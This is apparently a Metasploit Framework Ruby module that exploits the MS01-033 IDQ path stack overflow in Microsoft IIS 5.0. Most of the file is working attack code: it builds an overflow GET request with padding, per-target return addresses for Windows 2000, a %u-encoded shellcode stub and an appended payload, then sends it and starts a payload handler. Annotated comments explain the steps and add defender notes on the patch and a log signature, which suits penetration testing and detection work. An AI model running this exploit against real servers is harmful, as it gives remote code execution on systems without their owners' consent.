Path: blob/master/modules/exploits/windows/iis/ms01_033_idq.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# MS01-033: stack buffer overflow in the IDQ ISAPI handler of Microsoft Index
# Server on IIS 5.0 (CVE-2001-0500, OSVDB 568, BID 2880). The module sends a
# single HTTP GET whose path ends in ".idq" and whose query string carries
# %u-encoded words followed by the encoded payload; the payload runs without
# elevated privileges ('Privileged' => false) on the two Windows 2000 targets
# listed below.
#
# Defender notes: the vendor fix is the MS01-033 update referenced in
# 'References'. On the wire this request is a GET for a random one-character
# ".idq" resource with an unusually long query string (hundreds of bytes of
# alphanumeric padding plus "%u" sequences), which is a practical detection
# signature for IIS logs and HTTP inspection devices.
class MetasploitModule < Msf::Exploit::Remote
  # Reliability rank exported with the module metadata.
  Rank = GoodRanking

  # Supplies connect / sock / disconnect for the raw TCP exchange in #exploit.
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (name, references, payload constraints,
  # targets) with the framework and exposes RPORT (default 80) as the only
  # additional option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS01-033 Microsoft IIS 5.0 IDQ Path Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the IDQ ISAPI handler for
        Microsoft Index Server.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2001-0500'],
          [ 'OSVDB', '568'],
          [ 'MSB', 'MS01-033'],
          [ 'BID', '2880'],
        ],
      # EXITFUNC is the exit method handed to the payload; 'thread' is the
      # module's default (see the framework's payload option docs).
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },

      'Privileged'     => false,
      # Constraints for the payload encoder: 800 bytes of space, and the bytes
      # that must not appear because they would break the URI (NUL, ':', '&',
      # '?', '%', '#', space, LF, CR, '/', '+', VT, '\'). StackAdjustment is a
      # framework-level stack-pointer adjustment applied ahead of the payload;
      # the value is the author's choice — see framework docs.
      'Payload'        =>
        {
          'Space'    => 800,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },

      'Platform'       => 'win',
      # Each target carries the return address ('Ret') for that service-pack
      # level; #exploit consumes only its hex digits, in two 4-character slices.
      'Targets'        =>
        [
          [ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ],
          [ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],
        ],
      'DisclosureDate' => '2001-06-18',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(80)])
  end

  # Builds and sends the single malicious GET request, then hands off to the
  # payload handler. This is the framework's exploit entry point; it returns
  # nothing of interest and propagates whatever the socket layer raises.
  def exploit
    connect

    # Request path: one random character with the ".idq" extension, then a
    # 232-byte alphanumeric query-string filler that precedes the return
    # address.
    sploit =  rand_text_alphanumeric(1) + ".idq?" + rand_text_alphanumeric(232)
    # The target return address is emitted as two %u-encoded 16-bit words: the
    # low 4 hex digits of 'Ret' first, then the high 4 (target.ret presumably
    # yields the '0x........' string from the Targets table — confirm).
    sploit << "%u06eb.%u" + target.ret[-4, 4] + "%u" + target.ret[-8, 4]
    # Fixed %u-encoded stub carried verbatim from the original module; it is
    # neither decoded nor altered here.
    sploit << ".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF="
    # Ends the request line with an HTTP/1.0 version marker and CRLFCRLF; the
    # 46 bytes of padding (and the payload appended below) follow the header
    # terminator.
    sploit << rand_text_alphanumeric(1) + " HTTP/1.0\r\n\r\n" + rand_text_alphanumeric(46)

    # payload.encoded is appended after the header terminator, so the encoded
    # payload travels as trailing bytes of the same TCP send.
    uri = '/' + sploit + payload.encoded

    # A second CRLFCRLF closes the raw GET.
    res = "GET #{uri}\r\n\r\n"

    print_status("Trying target #{target.name}...")

    sock.put(res)

    # Start the payload handler, then close our socket.
    # NOTE(review): disconnect is not inside an ensure block, so a send failure
    # skips it and leaves socket cleanup to the framework — confirm.
    handler
    disconnect
  end
end